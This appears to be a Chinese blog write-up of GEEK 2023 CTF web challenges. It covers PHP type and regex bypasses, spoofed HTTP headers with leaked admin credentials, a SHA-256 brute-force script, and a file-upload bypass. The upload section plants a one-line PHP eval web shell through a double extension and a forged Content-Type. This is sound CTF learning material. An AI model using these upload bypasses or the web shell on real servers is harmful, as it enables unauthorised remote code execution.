GEEK极客部分WriteUp

发表于： 2023-11-07 分类于： CTF

字数： 1690 阅读：≈ 4分钟浏览：

一、easy_php

1
isset($_GET['syc'])&&preg_match('/^Welcome to GEEK 2023!$/i', $_GET['syc']) && $_GET['syc'] !== 'Welcome to GEEK 2023!'

isset($_GET[‘syc’])：检查$_GET[‘syc’]变量是否已设置，即检查用户是否传递了名为syc的参数。 preg_match(’/^Welcome to GEEK 2023!$/i’, $_GET[‘syc’])：使用正则表达式检查$_GET[‘syc’]的值是否与Welcome to GEEK 2023!完全匹配。i表示不区分大小写。 $_GET[‘syc’] !== ‘Welcome to GEEK 2023!’：检查$_GET[‘syc’]的值是否不等于Welcome to GEEK 2023！。

绕过

`1`	`syc=Welcome to geek 2023!`

1
intval($_GET['lover']) < 2023 && intval($_GET['lover'] + 1) > 2024

intval($_GET[’lover’]) < 2023：将$_GET[’lover’]转换为整数，然后检查该整数是否小于 2023。 intval($_GET[’lover’] + 1) > 2024：将$_GET[’lover’]转换为整数，加 1 后，检查该整数是否大于 2024。

要求intval($num)<2020 && intval($num+1)>2021 这里要传入一个普通的整数肯定是无法绕过的，要传过去一个科学记数法表示的数字，如?num=2e4，intval($num)=2，intval($num+1)=20001

1
isset($_POST['qw']) && $_POST['yxx']

绕过

`1`	`hackbar直接post写：qw=1&yxx=2`

1
2
3
$array1 = (string)$_POST['qw'];
            $array2 = (string)$_POST['yxx'];
            if (sha1($array1) === sha1($array2)) 

用sha1()函数計算每個數组的 SHA-1 哈希值。比较$array1的哈希值和$array2的哈希值。如果它們相同，則密碼匹配；否則，密碼不匹配。

绕过

`1`	`qw=1&yxx=1`

1
isset($_POST['SYC_GEEK.2023'])&&($_POST['SYC_GEEK.2023']="Happy to see you!")

绕过

`1`	`SYC[GEEK.2023=1`

二、Ezhttp

需要先进去网页的robot.txt网页（该网页和爬虫有关的）里面有用户密码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
POST / HTTP/1.1
Host: 1.117.175.65:23333
Content-Length: 253
Cache-Control: no-cache
User-Agent: Syclover
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryp0mRGvNDO8CTgw1S
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Referer: sycsec.com
X-Forwarded-For: 127.0.0.1
via: Syc.vip
O2TAKUXX: GiveMeFlag

------WebKitFormBoundaryp0mRGvNDO8CTgw1S
Content-Disposition: form-data; name="username"

admin
------WebKitFormBoundaryp0mRGvNDO8CTgw1S
Content-Disposition: form-data; name="password"

@dm1N123456r00t#
------WebKitFormBoundaryp0mRGvNDO8CTgw1S--

via: Syc.vip 代理服务器Syc.vip

X-Forwarded-For: 127.0.0.1 从127.0.0.1发起请求

Referer: sycsec.com 来源是sycsec.com

O2TAKUXX: GiveMeFlag Http自定义参数为GiveMeFlag

User-Agent: Syclover 使用Syclover浏览器

三、proof_of_work

需要用到一下nc链接59.110.20.54 5526

1
2
3
4
Cmd line: 59.110.20.54 5526
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
sha256(XXXX+tptFjH7yPLuQ8V3l) == 037984e0b5358c11e77e518d4a998163e9f8021969b7c9bb8ff1d66b37d0e9b9
Give me XXXX:

看到sha256(XXXX+tptFjH7yPLuQ8V3l)，可以知道是sha256加密，XXXX应该是给的提示需要补充的字符串，等于号后面是指令的哈希值，所以第一个就可以想到使用哈希碰撞来得到这四个字符。

以下是碰撞的python代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import hashlib

def find_collision(known_plaintext, known_hash, charset, min_value, max_value):
    for a in range(min_value, max_value + 1):
        for b in range(min_value, max_value + 1):
            for c in range(min_value, max_value + 1):
                for d in range(min_value, max_value + 1):
                    plaintext = f"{charset[a - 1]}{charset[b - 1]}{charset[c - 1]}{charset[d - 1]}{known_plaintext}"
                    hash_value = hashlib.sha256(plaintext.encode()).hexdigest()
                    print(plaintext+"还在碰撞中")
                    if hash_value == known_hash:
                        return plaintext
    return None

known_plaintext = "E2g37ZVS00iwlIrO"
known_hash = "cd0f34c6a816a54075851cf66c864dafd0fbb0d8119cc2084b54a006d561c308"
charset = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
min_value = 1
max_value = 62

collision = find_collision(known_plaintext, known_hash, charset,min_value, max_value)
if collision:
    print(f"找到了一个碰撞：{collision}")
else:
    print("没有找到碰撞")

四、n00b_Upload

后缀判定

1
2
3
4
5
6
7
8
9
$ext_arr = array('jpg','png','gif','php');
 //黑名单
 $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","pHp","pHp5","pHp4","pHp3","pHp2","Html","Htm","pHtml","jsp","jspa","jspx","jsw","jsv","jspf","jtml","jSp","jSpx","jSpa","jSw","jSv","jSpf","jHtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","aSp","aSpx","aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf","htaccess","ini");
 $file_ext = substr($_FILES['file']['name'],strrpos($_FILES['file']['name'],".")+1);
 //判断filename是否为空
 $file = empty($_POST['filename']) ? $_FILES['file']['name'] : $_POST['filename'];
 //判断filename的后缀是不是在黑名单
 $name = basename($_POST['filename']);
 $filename_ext= pathinfo($name,PATHINFO_EXTENSION);

请求头头部判定

1
2
3
//检验文件头content-type
    if (($_FILES['file']['type'] == 'image/jpeg') || ($_FILES['file']['type'] == 'image/png') || ($_FILES['file']['type'] == 'image/gif')){
    echo "头部过了<br>";

文件内容判定

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
 //整个文件内容检测
       if (!empty($_FILES['file'])) {
        $filename = $_FILES['file']['name'];
        $filetype = $_FILES['file']['type'];
        $filesize = $_FILES['file']['size'];
        $tmp_name = $_FILES['file']['tmp_name'];
        # generate a new filename based on a random number and the original file extension
        $new_filename = rand(100000, 999999) . '_' . uniqid() . '.' . $file_ext;

        
        # move uploaded file to the target directory
        $target_dir = 'uploadtest';
        $target_path = $target_dir . '/' . $new_filename;
    if (move_uploaded_file($tmp_name, $target_path)) {
        # get file contents and check if it contains PHP code
        $file_content = file_get_contents($target_path);
        if (preg_match('/<\?(php)|<script\b[^>]*>(.*?)<\/script>/si', $file_content)) {
            die('你上传的内容一看就是木马<br>https://ys.mihoyo.com/');

综上所述，使用1.php.jpg即可绕过后最检测，使用burp可以改请求头头部为image/jpeg，然后一句话木马为<?=eval($_POST[“cmd”]);再用菜刀链接即可（不知道为什么蚁剑不行）

以上php内容都是通过菜刀链接获得upload_file.php得来的